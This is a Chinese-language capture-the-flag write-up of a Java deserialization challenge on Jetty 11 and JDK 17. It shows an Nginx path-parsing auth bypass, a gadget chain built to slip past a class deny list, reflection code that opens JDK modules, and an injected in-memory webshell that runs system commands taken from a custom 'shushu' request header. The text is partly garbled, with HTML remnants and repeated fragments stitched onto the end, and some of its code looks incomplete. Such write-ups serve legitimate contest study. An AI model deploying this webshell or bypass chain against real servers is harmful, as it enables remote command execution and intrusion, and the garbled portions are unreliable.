2025湾区杯AWDP赛题ezjava漏洞利用详解<\/h1>

题目概述<\/h2>
本题为2025年湾区杯AWDP比赛中一道Web题目，考察Java反序列化漏洞利用能力。题目基于Jetty服务器，需要绕过自定义黑名单防御机制，利用JNI加密库特性，最终实现内存马注入。<\/p>

环境分析<\/h2>

核心代码结构<\/h3>

public<\/span> class<\/span> AdminServlet<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> byte<\/span>[]<\/span> SECRET_KEY =<\/span> "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"<\/span>.<\/span>getBytes<\/span>(<\/span>StandardCharsets.<\/span>UTF_8<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        resp.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>Arrays.<\/span>toString<\/span>(<\/span>SECRET_KEY));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    protected<\/span> void<\/span> doPost<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        String body =<\/span> req.<\/span>getReader<\/span>().<\/span>lines<\/span>().<\/span>collect<\/span>(<\/span>Collectors.<\/span>joining<\/span>(<\/span>System.<\/span>lineSeparator<\/span>()));<\/span>
<\/span><\/span>        \/\/ 1. Base64解码
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> encryptedData =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>body);<\/span>
<\/span><\/span>        \/\/ 2. JNI解密
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> decryptedData =<\/span> JniCrypto.<\/span>decrypt<\/span>(<\/span>encryptedData,<\/span> SECRET_KEY);<\/span>
<\/span><\/span>        \/\/ 3. 反序列化
<\/span><\/span><\/span><\/span>        ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>decryptedData);<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>bais);<\/span>
<\/span><\/span>        Object obj =<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御机制<\/h3>
自定义ObjectInputStream黑名单检测：<\/p>
public<\/span> class<\/span> MyObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        String className =<\/span> desc.<\/span>getName<\/span>();<\/span>
<\/span><\/span>        String[]<\/span> denyClasses =<\/span> {<\/span>
<\/span><\/span>            "java.net.InetAddress"<\/span>,<\/span> "sun.rmi.transport.tcp.TCPTransport"<\/span>,<\/span>
<\/span><\/span>            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,<\/span>
<\/span><\/span>            "java.lang.Runtime"<\/span>,<\/span> "java.lang.ProcessBuilder"<\/span>,<\/span>
<\/span><\/span>            "org.springframework.aop.aspectj.AspectJAroundAdvice"<\/span>
<\/span><\/span>            \/\/ 完整黑名单包含30+个类
<\/span><\/span><\/span><\/span>        };<\/span>
<\/span><\/span>        for<\/span> (<\/span>String denyClass :<\/span> denyClasses)<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>className.<\/span>startsWith<\/span>(<\/span>denyClass))<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized deserialization attempt"<\/span>,<\/span> className);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链构建<\/h2>
链式结构设计<\/h3>
需要结合两种利用链：<\/p>

SpringBoot AOP链<\/strong>（起点：EventListenerList）<\/li>
JDK 17新链<\/strong>（替代TemplatesImpl的字节码生成方式）<\/li>
<\/ol>
关键绕过技术<\/h3>
1. Jetty解析差异绕过<\/h4>
Nginx配置存在路径解析差异：<\/p>
location<\/span> \/myapp\/<\/span> {
<\/span><\/span>    auth_basic<\/span> "Admin<\/span> Area"<\/span>;
<\/span><\/span>    proxy_pass<\/span> http:\/\/127.0.0.1:8080<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>可通过\/myapp\/;admin<\/code>绕过认证<\/p>
2. JNI加密处理<\/h4>
libcrypto.so<\/code>中的加密函数需要逆向分析，实际为变种AES算法。需先通过GET请求获取SECRET_KEY，然后使用相同算法加密payload。<\/p>
3. 模块系统绕过<\/h4>
JDK 17需要处理模块访问限制，关键代码：<\/p>
\/\/ 打开模块访问权限
<\/span><\/span><\/span><\/span>Method getModule =<\/span> Class.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"getModule"<\/span>);<\/span>
<\/span><\/span>Module module =<\/span> (<\/span>Module)<\/span> getModule.<\/span>invoke<\/span>(<\/span>targetClass);<\/span>
<\/span><\/span>Method isOpen =<\/span> Module.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"isOpen"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> Module.<\/span>class<\/span>);<\/span>
<\/span><\/span>if<\/span> (!(<\/span>Boolean)<\/span> isOpen.<\/span>invoke<\/span>(<\/span>module,<\/span> pkg,<\/span> Module.<\/span>class<\/span>.<\/span>getModule<\/span>()))<\/span> {<\/span>
<\/span><\/span>    Method openModule =<\/span> Module.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"open"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>    openModule.<\/span>invoke<\/span>(<\/span>module,<\/span> pkg);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>内存马注入技术<\/h2>
Jetty高版本适配<\/h3>
Jetty 11.0.26使用jakarta.servlet包而非javax.servlet，需要重新挖掘内存马。<\/p>
上下文获取技术<\/h3>
使用java-object-searcher工具从线程中获取Request对象：<\/p>
\/\/ 搜索Request对象
<\/span><\/span><\/span><\/span>List<<\/span>Keyword><\/span> keywords =<\/span> new<\/span> ArrayList<>();<\/span>
<\/span><\/span>keywords.<\/span>add<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"org.eclipse.jetty.server.Request"<\/span>).<\/span>build<\/span>());<\/span>
<\/span><\/span>SearchRequester searcher =<\/span> new<\/span> SearchRequester(<\/span>thread,<\/span> keywords);<\/span>
<\/span><\/span>searcher.<\/span>search<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>内存马实现代码<\/h3>
Field _channelField =<\/span> httpConnection.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_channel"<\/span>);<\/span>
<\/span><\/span>_channelField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object channel =<\/span> _channelField.<\/span>get<\/span>(<\/span>httpConnection);<\/span>
<\/span><\/span>
<\/span><\/span>Field _requestField =<\/span> channel.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_request"<\/span>);<\/span>
<\/span><\/span>_requestField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Request request =<\/span> (<\/span>Request)<\/span> _requestField.<\/span>get<\/span>(<\/span>channel);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 命令执行逻辑
<\/span><\/span><\/span><\/span>String cmd =<\/span> request.<\/span>getHeader<\/span>(<\/span>"shushu"<\/span>);<\/span>
<\/span><\/span>if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>    Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    \/\/ 结果回传
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>注入技术<\/h3>
通过反射修改HandlerList实现注入：<\/p>
Field _handlersField =<\/span> server.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_handlers"<\/span>);<\/span>
<\/span><\/span>_handlersField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Handler[]<\/span> handlers =<\/span> (<\/span>Handler[])<\/span> _handlersField.<\/span>get<\/span>(<\/span>server);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建新的HandlerList并注入
<\/span><\/span><\/span><\/span>HandlerList newHandlers =<\/span> new<\/span> HandlerList();<\/span>
<\/span><\/span>newHandlers.<\/span>addHandler<\/span>(<\/span>maliciousHandler);<\/span>
<\/span><\/span>newHandlers.<\/span>addHandler<\/span>(<\/span>handlers);<\/span>
<\/span><\/span>_handlersField.<\/span>set<\/span>(<\/span>server,<\/span> newHandlers);<\/span>
<\/span><\/span><\/code><\/pre>完整利用流程<\/h2>

获取密钥<\/strong>：GET请求\/admin<\/code>获取SECRET_KEY<\/li>
构造payload<\/strong>：结合Spring AOP和JDK17链构造反序列化数据<\/li>
加密处理<\/strong>：使用变种AES算法加密payload<\/li>
发送请求<\/strong>：POST发送Base64编码的加密数据<\/li>
绕过认证<\/strong>：使用路径\/myapp\/;admin<\/code>绕过Nginx认证<\/li>
内存马注入<\/strong>：成功执行反序列化后注入内存马<\/li>
命令执行<\/strong>：通过自定义请求头执行系统命令<\/li>
<\/ol>
技术要点总结<\/h2>

黑名单绕过<\/strong>：利用非黑名单类构造利用链<\/li>
高版本适配<\/strong>：JDK 17模块系统和Jetty 11包名变化处理<\/li>
JNI分析<\/strong>：需要逆向分析加密算法实现<\/li>
内存马技术<\/strong>：高版本Jetty的内存马实现方式<\/li>
解析差异<\/strong>：利用Web服务器解析特性绕过防护<\/li>
<\/ol>
该题目综合考察了Java反序列化、加密算法分析、内存马等多项高级渗透技术，需要具备完整的Java漏洞利用知识体系。<\/p>

2025湾区杯AWDP赛题ezjava漏洞利用详解<\/h1>

题目概述<\/h2> 本题为2025年湾区杯AWDP比赛中一道Web题目，考察Java反序列化漏洞利用能力。题目基于Jetty服务器，需要绕过自定义黑名单防御机制，利用JNI加密库特性，最终实现内存马注入。<\/p>

环境分析<\/h2>

漏洞利用链构建<\/h2>

关键绕过技术<\/h3>

内存马注入技术<\/h2>

Jetty高版本适配<\/h3> Jetty 11.0.26使用jakarta.servlet包而非javax.servlet，需要重新挖掘内存马。<\/p>

题目概述<\/h2>
本题为2025年湾区杯AWDP比赛中一道Web题目，考察Java反序列化漏洞利用能力。题目基于Jetty服务器，需要绕过自定义黑名单防御机制，利用JNI加密库特性，最终实现内存马注入。<\/p>

Jetty高版本适配<\/h3>
Jetty 11.0.26使用jakarta.servlet包而非javax.servlet，需要重新挖掘内存马。<\/p>